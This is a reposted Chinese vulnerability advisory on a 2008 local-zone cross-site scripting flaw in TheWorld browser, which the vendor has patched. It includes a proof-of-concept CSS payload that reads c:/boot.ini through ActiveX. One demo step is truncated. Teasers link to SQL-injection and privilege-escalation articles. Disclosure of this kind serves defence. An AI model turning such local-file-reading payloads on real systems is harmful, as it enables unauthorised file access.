驱动管家:安全、高效、精准的专业驱动下载站!

世界之窗浏览器漏洞分析 该漏洞的修补方法是什么?

2018-03-14 15:03:56责编:llp   来源:驱动管家     人气:

漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html

文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单分析如下:

str_name和str_url不经过滤地直接输出,由于该页面处于本地安全区域,所以拥有很高的权限,可以做很多跨域操作,包括读取文件和运行本地程序。

世界之窗浏览器漏洞分析 该漏洞的修补方法是什么?

漏洞修补:

已经用js控制DOM显示了

漏洞演示:这里提供测试方法可以读取c:/boot.ini

1 打开如下地址

sc:h’>

2 上面将导致一个不可访问的页面,然后直接关闭tw浏览器( 没有好的办法crash)

3 重新打开tw浏览器,可以发现http://www.80sec.com/1.css中的内容被解析,并且有本地域的权限。

1.css内容,换成其他js代码一样执行

body {

background-image: url('javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);')

}

漏洞状态:

2008-06-24通知厂商

2008-06-25修补

http://www.ioage.com/cnnew/uplog.htm

  • 恶意网站是什么网站?恶意网站的相关知识

    恶意网站是什么网站?恶意网站的相关知识

    当我们在访问一些网站是会弹出一些提示,有时候QQ管家、金山毒霸是经常弹出访问提示,不注意就会扣掉很多钱,那么真正的恶意网站又是怎么一回事,又有多少人彻底的明白呢?一起来看看吧。| 前言恶意网站在大家平

    详情2018-01-12 15:27:06责编:llp   来源:驱动管家     
  • 微软捆绑web浏览器:Internet Explorer存在欺骗漏洞

    微软捆绑web浏览器:Internet Explorer存在欺骗漏洞

    受影响系统:Microsoft Internet Explorer 7 0Microsoft Internet Explorer 6 0 SP1Microsoft Internet Explorer 6 0Microsoft Internet Explorer 5 0 1 SP4描述:BUGTRAQ ID: 25915CVE(CAN) ID

    详情2018-03-14 10:09:58责编:llp   来源:驱动管家     
  • 通信协议有哪些?各通信协议的主要用途和特点

    通信协议有哪些?各通信协议的主要用途和特点

    做过网络人都知道,要实现网络间的正常通信就必需选择合适的通信协议,否则轻则就会造成网络的接入速度太慢,工作不稳定,重则根本无法接通。今天我把我实际工作积累的此方面经验与大家分享,希望对还在迷茫中的

    详情2018-01-20 14:28:53责编:llp   来源:驱动管家     
  • SQL注入攻击有哪些种类?防御和检查SQL注入的手段介绍

    SQL注入攻击有哪些种类?防御和检查SQL注入的手段介绍

    知彼知己,方可取胜。首先要清楚SQL注入攻击有哪些种类。1 没有正确过滤转义字符在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对

    详情2018-03-11 16:23:41责编:llp   来源:驱动管家     
  • 自己总结的常用注入代码 能帮到你吗?

    自己总结的常用注入代码 能帮到你吗?

    我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! 看看是什么权限的and 1=(Select IS_MEMBER(& 39;db_owner& 39;))And char(124)%2BCast(IS_MEMBER(& 39;db_o

    详情2018-03-12 14:01:27责编:llp   来源:驱动管家     
  • 怎么利用metasploit漏洞的利用工具?

    怎么利用metasploit漏洞的利用工具?

    当连接MariaDB MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据

    详情2018-02-06 15:21:36责编:llp   来源:驱动管家     
  • 数据库拿shell有哪些方法?数据库拿shell的教程

    数据库拿shell有哪些方法?数据库拿shell的教程

    进后台看看:1 有上传2 有数据库操作3 有系统设置拿shell,我有三种方法1 上传直接上传抓包爆出路径filepath,这里可以考虑NC提交,或者本地修改元素建立 asp文件夹这里我直接用googlechrome审查元素 uppics 1

    详情2018-02-09 14:38:53责编:llp   来源:驱动管家     
  • 天网防火墙如何安装?天网防火墙怎么禁止本地用户使用ping命令?

    天网防火墙如何安装?天网防火墙怎么禁止本地用户使用ping命令?

    任务一 正确安装天网防火墙任务二 利用防火墙进行以下实验1、禁止局域网用户使用PING命令对本机进行嗅探2、禁止本地QQ登录及应用3、禁止本地用户使用PING命令通过以上内容的学习,实际操作天网防火墙的设置,并

    详情2018-01-22 10:55:31责编:llp   来源:驱动管家     
  • 中国移动mas平台系统漏洞修复有什么方法?

    中国移动mas平台系统漏洞修复有什么方法?

    MAS是中国移动的短信代理网关(平台)。MAS是Mobile Agent Server的简称。目前多个政府部门、国有大型企业部门、运营商、金融部门都采用该平台。MAS2 0是中国新一代的代理网关系统。漏洞有可能会泄露使用该平台

    详情2018-02-07 10:28:16责编:llp   来源:驱动管家     
  • mssql2005怎么入侵提权?sql 2005提权的过程

    mssql2005怎么入侵提权?sql 2005提权的过程

    文章作者:udb311前言:本文主要以SQL 2005提权为主,讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说。前期在拿到一个webshell 后对提权进行分析如下。1、serv-u 6 4 0 2、mssql sa密码权

    详情2018-01-26 15:42:22责编:llp   来源:驱动管家